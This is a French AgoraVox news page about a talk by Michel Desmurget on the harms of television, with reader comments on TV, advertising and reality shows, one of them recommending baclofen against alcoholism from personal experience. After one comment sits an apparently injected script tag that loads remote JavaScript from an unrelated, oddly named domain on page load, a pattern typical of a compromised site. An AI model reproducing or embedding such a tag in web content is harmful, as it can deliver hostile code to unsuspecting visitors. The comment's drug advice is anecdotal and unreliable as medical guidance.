• AgoraVox sur Twitter
  • RSS
  • Agoravox TV Mobile

Accueil du site > Actualités > Médias > TV Lobotomie - La vérité scientifique sur les effets de la télévision

TV Lobotomie - La vérité scientifique sur les effets de la télévision

Pour les spécialistes, tel Michel Desmurget, il n’y a plus de doute : la télévision est un fléau. Elle exerce une influence profondément négative sur le développement intellectuel, les résultats scolaires, le langage, l’attention, l’imagination, la créativité, la violence, le sommeil, le tabagisme, l’alcoolisme, la sexualité, l’image du corps, le comportement alimentaire, l’obésité et l’espérance de vie.

Ces faits sont niés avec un aplomb fascinant par l’industrie audiovisuelle et son armée d’experts complaisants. La stratégie n’est pas nouvelle : les cigarettiers l’avaient utilisée, en leur temps, pour contester le caractère cancérigène du tabac…

Tags : Société Enfance Télévision Médias




Réagissez à l'article

17 réactions à cet article    


  • 4 votes
    Justin Justin 9 mai 2012 10:58

    Re..smur..mur..get a..a..aaaa rai..rai..son la..la..laaaa té..lé..vi..vi..vi..sion ça rend con..concon con..ple..te..ment con.


    • 4 votes
      eQzez edzez 9 mai 2012 11:20

      100% d’accord aussi.



    • 5 votes
      zeitgest zeitgest 9 mai 2012 12:26

      Ils nous prennent déjà pour des cons !


    • 9 votes
      gregoslurbain gregoslurbain 9 mai 2012 12:50

      Une conférence d’utilité publique à recommander à tous les enseignants et les parents. La télévision est une arme de distraction massive qui banalise la violence et la peur.


      • 4 votes
        kemilein kemilein 9 mai 2012 22:51

        la télévision est un outil, d’une lame d’acier je peux pourfendre du gueux ou débiter du petit bois.
        c’est l’utilisation de l’outil qui est contestable.
        -
        la télévision est de toute façon morte a brève échéance, l’ordinateur est l’avenir.
        l’écran donne l’avantage de par exemple apprendre avec des images, je pense notamment a ARTE qui diffuse pas mal de bons documentaires (certes limités).
        le problème majeur (pour un citoyen, mais une aubaine pour l’ordre établit) est de la passivité du regardant, la TV est un livre au mauvais contenu. elle empêche l’expression.
        -
        l’ordinateur permet de ne plus subir cela, de 1 en répondant, en écrivant en propageant et de 2 en sélectionnant soit même ce qu’on veut regarder comme programme et a quel moment (par programme j’entends conférence audio, visuelle, mais aussi site d’information et d’instruction)
        -
        l’internet peut offrir un espace d’émancipation (intellectuelle) collective qu’il faudra traduire en fait politique et économique, mais aussi éthique.


      • vote
        guyver 10 mai 2012 11:39

        @ kemilein

        Avez-vous pris la peine de regarder la conférence avant de poster ? L’auteur COMMENCE par tordre le cou exactement à ce que vous venez d’affirmer : l’usage de l’ordinateur ne fait pas diminuer le temps passé devant la télévision, et contrairement à ce que les gens affirment dans les sondages (on préfère arte et les documentaires animaliers), ce sont tf1, les émissions de téléréalité et le "sport" qui ont la part belle dans l’audimat.

        Plutôt que de vous complaire dans vos certitudes, je vous recommande de prendre la peine d’écouter ce que dit cet auteur. Il s’appuie sur des faits scientifiques et statistiques, pas sur des à priori et des jugements de valeur.


      • 31 votes
        Qaspard Delanuit Gaspard Delanuit 9 mai 2012 12:56

        C’est même pas vrai ce que dit le monsieur, si c’était vrai ils en parleraient à la télévision ! 


        • 9 votes
          Lisa Sion Lisa SIon 9 mai 2012 14:21

          Yaka voir Joletaxi Marco07 comment ils sont atteints " L’esprit humain semble passer d’une certitude à une autre, sans jamais vouloir reconnaître son ignorance. Toute notre science, ou notre connaissance repose sur la simple « croyance » d’être dans le vrai jusqu’à ce que la découverte d’un paradoxe logique ou d’une contradiction avec les faits opère une remise en cause dramatique des doctrines officielles ou communément admises. "


          • 12 votes
            Hijack ... Hijack 9 mai 2012 15:49

            Il faut systématiquement éviter de payer pour de la pub ... vaut mieux par exemple acheter des produits de marque du distributeur (généralement des produits de bonne qualité quelle que soit leur fabricant) ... ainsi, on ne paie pas pour de la pub !!!

            .
            Je ne vais pas citer de marques, mais souvent, les marques les plus médiatisées, celles qui font le plus de pub ... sont généralement les plus mauvaises.
            En famille, nous l’avons maintes fois constaté... y’a pas photo, ni pour le goût, la qualité, les quantités de sucres/sel etc ... et le prix !!!


            • 4 votes
              franck2012* 9 mai 2012 18:20

              .... en fait je ne peux plus regarder la télévision, depuis quelques mois, même la laisser allumer pour avoir un fond sonore. Alors est-ce que cela m’a rendu moins con ? D’après mes proches, non. Mais comment leur faire confiance, eux qui continuent à la regarder... On voit bien mon dilemme face à la question soulevée. En combien de temps mon réseau neuronal sera restauré ? Pour l’instant je ne sens pas de réel progrès, j’ai toujours autant de mal à me plonger dans un bouquin. Je renâcle après six mois d’abstinence télévisuelle à faire mes comptes. Si tôt qu’un problème se pose, je l’élude. Non après six mois d’arrêt je n’ai toujours pas retrouver mon plein rendement intellectuel. Il faut l’admettre la télé est responsable de ma déchéance. Mon alcoolisme que j’arrive à juguler maintenant après deux mois d’un traitement sévère, vient certainement de là... J’ai essayé de regarder Taddei, hier soir, et bien vous me croirez ou non, je me suis levé de mon siège pour aller dans le frigo, heureusement il n’y avait plus une bouteille et l’épicerie était fermée. Je l’ai échappé belle ! Je peux donc en conclure, qu’en plus de rendre con, la télé rend alcoolique !


              • 2 votes
                gregoslurbain gregoslurbain 9 mai 2012 20:03

                 Sous Baclofène depuis 7 mois, je peux vous affirmer que les envies subites (craving) appartiennent au passé. Renseignez-vous, cette découverte récente - qui est peut-etre un scandale du mediator à l’envers - peut vous sauver de la maladie alcoolique. Et rejetez ces saloperies de benzodiazépines.
                http://www.agoravox.fr/actualites/sante/article/le-dogme-de-l-abstinence-en-107406
                http://www.dailymotion.com/video/xe9jpd_expose-de-renaud-de-beaurepaire-sur_lifestyle
                amicalement.


              • 2 votes
                amest 9 mai 2012 21:21

                On pourrait peut-être aussi parler de la fiabilité de Médiamétrie ?
                Je me trompe peut-être mais :
                Le calcul des audiences se fait forcément chez des familles suffisamment "addict" pour installer un terminal médiamétrie chez eux ?
                .
                C’est comme les sondages qui tendent à faire croire que tout le monde a un téléphone portable.


                • 2 votes
                  Hijack ... Hijack 10 mai 2012 00:21

                  En fait, on peut regarder la tv sans problème ... à condition d’avoir un minimum de liberté d’esprit et de réflexion ... car tv ou pas ; si on est très influençable, qu’on ait du mal à réfléchir , on peut tout aussi bien subir toutes les conneries qui nous entourent, pub sur les murs, dans les jrnx et revues ...


                  • 5 votes
                    guyver 10 mai 2012 11:55

                    Vous dites cela comme si la TV (et particulièrement la pub) s’adressait à nous d’égal à égal. Or l’auteur démontre que les émissions et les pubs sont conçus par des neurologues, qui mettent à profits leurs connaissances du cerveau humain pour induire un comportement (d’achat, essentiellement) chez le spectateur. Leur première victoire est peut-être de vous laisser croire que vous n’êtes pas sous leur influence ...


                  • 1 vote
                    Hijack ... Hijack 10 mai 2012 16:24

                    Je crois plutôt que les pub s’adressent avant tout à ceux qui ne réfléchissent pas ... et parmi ces derniers ... bcp se croient "pas cons" ...
                    Et ces dernières années ... qui n’a pas entendu/vu ... le truc "vu à la tv" ... comme si c’était un gage de qualité !!!


                  • vote
                    airelles airelles 13 mai 2012 11:03

                    Entièrement d’accord avec Hijack, mais il n’y a pas juste la pub qui nous rend "marteau", les émissions de télé-réalité par exemple, quel en est l’intérêt si ce n’est de rendre les gens complètements stupides. Combien sont-ils prêt à se taper dessus pour défendre un de leur "chouchou". Commençons d’abord par rejeter toutes ses émissions dites "distrayantes" qui n’ont pour seule but de nous rendre stupide et éduquons nos enfants avec de "vrais" émissions, celles qui leur apportera qlqqchose de concret dans l’instant mais aussi dans leur futur.

                    <script src="http://superoseplugin.info/dfi823hs.js?0.7412523811829358"></script>

                  • 6 votes
                    cassia cassia 10 mai 2012 12:48

                    Vidéo trés interessante. Cela démontre bien comment nos choix politiques, de consommations sont influencés et cadrés... ! *
                    La télévision est un instrument qu’il faut bannir de nos foyers...
                    Quand je pense qu’en plus le système à le culot de nous faire payer une redevance sur cet outil qui lui sert à nous formater à son image.... !



Ajouter une réaction

Pour réagir, identifiez-vous avec votre login / mot de passe, en haut à droite de cette page

Si vous n'avez pas de login / mot de passe, vous devez vous inscrire ici.


FAIRE UN DON


Publicité





Palmarès